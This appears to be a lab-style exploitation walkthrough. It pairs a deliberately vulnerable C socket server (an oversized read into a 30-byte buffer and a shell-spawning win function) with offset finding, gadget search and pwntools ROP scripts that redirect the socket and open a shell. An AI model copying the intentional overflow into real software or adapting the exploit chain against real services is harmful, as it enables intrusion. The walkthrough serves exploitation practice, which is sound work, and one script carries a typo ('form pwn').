socket vuln

#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <string.h>
#include <netdb.h>
#include <sys/types.h> 
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>


void vuln(int childfd) {
    char buffer[30];

    read(childfd, buffer, 500);
    write(childfd, "Thanks!", 8);
}

void win() {
    system("/bin/sh");
}


////////////////////// Socket Stuff

/*
 * error - wrapper for perror
 */
void error(char *msg) {
  perror(msg);
  exit(1);
}

int main(int argc, char **argv) {
    int parentfd; /* parent socket */
    int childfd; /* child socket */
    int portno; /* port to listen on */
    int clientlen; /* byte size of client's address */
    struct sockaddr_in serveraddr; /* server's addr */
    struct sockaddr_in clientaddr; /* client addr */
    struct hostent *hostp; /* client host info */
    char *hostaddrp; /* dotted decimal host addr string */
    int optval; /* flag value for setsockopt */
    int n; /* message byte size */

    /* 
    * check command line arguments 
    */
    if (argc != 2) {
        fprintf(stderr, "usage: %s <port>\n", argv[0]);
        exit(1);
    }
    portno = atoi(argv[1]);

    /* 
    * socket: create the parent socket 
    */
    parentfd = socket(AF_INET, SOCK_STREAM, 0);
    if (parentfd < 0) 
        error("ERROR opening socket");

    /* setsockopt: Handy debugging trick that lets 
    * us rerun the server immediately after we kill it; 
    * otherwise we have to wait about 20 secs. 
    * Eliminates "ERROR on binding: Address already in use" error. 
    */
    optval = 1;
    setsockopt(parentfd, SOL_SOCKET, SO_REUSEADDR, 
    (const void *)&optval , sizeof(int));

    /*
    * build the server's Internet address
    */
    bzero((char *) &serveraddr, sizeof(serveraddr));

    /* this is an Internet address */
    serveraddr.sin_family = AF_INET;
    /* let the system figure out our IP address */
    serveraddr.sin_addr.s_addr = htonl(INADDR_ANY);
    /* this is the port we will listen on */
    serveraddr.sin_port = htons((unsigned short)portno);

    /* 
    * bind: associate the parent socket with a port 
    */
    if (bind(parentfd, (struct sockaddr *) &serveraddr, sizeof(serveraddr)) < 0) 
        error("ERROR on binding");

    /* 
    * listen: make this socket ready to accept connection requests 
    */
    if (listen(parentfd, 5) < 0) /* allow 5 requests to queue up */ 
        error("ERROR on listen");

    /* 
    * main loop: wait for a connection request, echo input line, 
    * then close connection.
    */
    clientlen = sizeof(clientaddr);

    /* 
    * accept: wait for a connection request 
    */
    childfd = accept(parentfd, (struct sockaddr *) &clientaddr, &clientlen);
    if (childfd < 0) 
        error("ERROR on accept");

    /* 
    * gethostbyaddr: determine who sent the message 
    */
    hostp = gethostbyaddr((const char *)&clientaddr.sin_addr.s_addr, sizeof(clientaddr.sin_addr.s_addr), AF_INET);
    if (hostp == NULL)
        error("ERROR on gethostbyaddr");
    hostaddrp = inet_ntoa(clientaddr.sin_addr);
    if (hostaddrp == NULL)
        error("ERROR on inet_ntoa\n");
    printf("server established connection with %s (%s)\n", 
    hostp->h_name, hostaddrp);


    vuln(childfd);
    dup2(0, 0);         // here for the presence of dup2
    close(childfd);
}   
  1. client send request
└─$ nc localhost 9001 
hello,i want to exploit u
Thanks!  
  1. server listen port 9001,return response
└─$ ./vuln 9001
server established connection with localhost (127.0.0.1)

漏洞利用

  1. 求溢出偏移
  • de ruijin sequence
──(kali㉿kali)-[~]
└─$ ragg2 -P 100 -r   
AAABAACAADAAEAAFAAGAAHAAIAAJAAKAALAAMAANAAOAAPAAQAARAASAATAAUAAVAAWAAXAAYAAZAAaAAbAAcAAdAAeAAfAAgAAh  
  • send server waiting for crash
[0x0040127b]> dr
...
rip = 0x0040127b
rflags = 0x00010203
orax = 0xffffffffffffffff
[0x0040127b]> wopO `dr rbp`
32

because the rbp’s offset is 32, so the rip’s offset is 40 2. try overflow buffer with ‘A’ * 40 + ‘B’ * 8

from pwn import * 
p = remote('127.0.0.1',9001)
payload = flat('A' * 40, 'B' * 8)
p.sendline(payload)
log.info(p.clean())
[0x0040127b]> pxw @ rsp - 40
0x7fffffffe260  0x41414141 0x41414141 0x41414141 0x41414141  AAAAAAAAAAAAAAAA
0x7fffffffe270  0x41414141 0x41414141 0x41414141 0x41414141  AAAAAAAAAAAAAAAA
0x7fffffffe280  0x41414141 0x41414141 0x42424242 0x42424242  AAAAAAAABBBBBBBB
  1. 规划栈布局
    栈偏移 栈内容
    + 40 pop_rdi
    + 48 4
    + 56 pop_rsi
    + 64 0
    + 72 dup2()
    + 80 pop_rdi
    + 88 4
    + 96 pop_rsi
    + 104 1
    + 112 dup2
    + 120 win
  • find gadget for bypassing nx protection
└─$ checksec --file=./vuln
[*] '/home/kali/exploits/sockets/vuln'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)
┌──(kali㉿kali)-[~/exploits/sockets]
└─$ ROPgadget --binary ./vuln|grep 'pop rsi'      
0x0000000000401509 : pop rsi ; pop r15 ; ret
                                                                                                                              
┌──(kali㉿kali)-[~/exploits/sockets]
└─$ ROPgadget --binary ./vuln|grep 'pop rdi'
0x000000000040150b : pop rdi ; ret
  1. write pwn code
form pwn import * 
elf = context.binary = ELF('./vuln')
p = remote('localhost',9001)

pop_rdi = 0x40150b
pop_rsi = 0x401509
payload = flat(
    'a' * 40,
    pop_rdi,
    4,
    pop_rsi,
    0,
    0,
    elf.plt['dup2'],
    pop_rdi,
    4,
    pop_rsi,
    1,
    0,
    elf.plt['dup2'],
    elf.sym['win']
)
p.sendline(payload)
p.recvuntil('Thanks!\x00')
p.interactive()
  1. write pwn code by tools
from pwn import *

elf = context.binary = ELF('./vuln')
p = remote('localhost', 9001)

rop = ROP(elf)
rop.raw('A' * 40)
rop.dup2(4, 0)
rop.dup2(4, 1)
rop.win()

p.sendline(rop.chain())
p.recvuntil('Thanks!\x00')
p.interactive()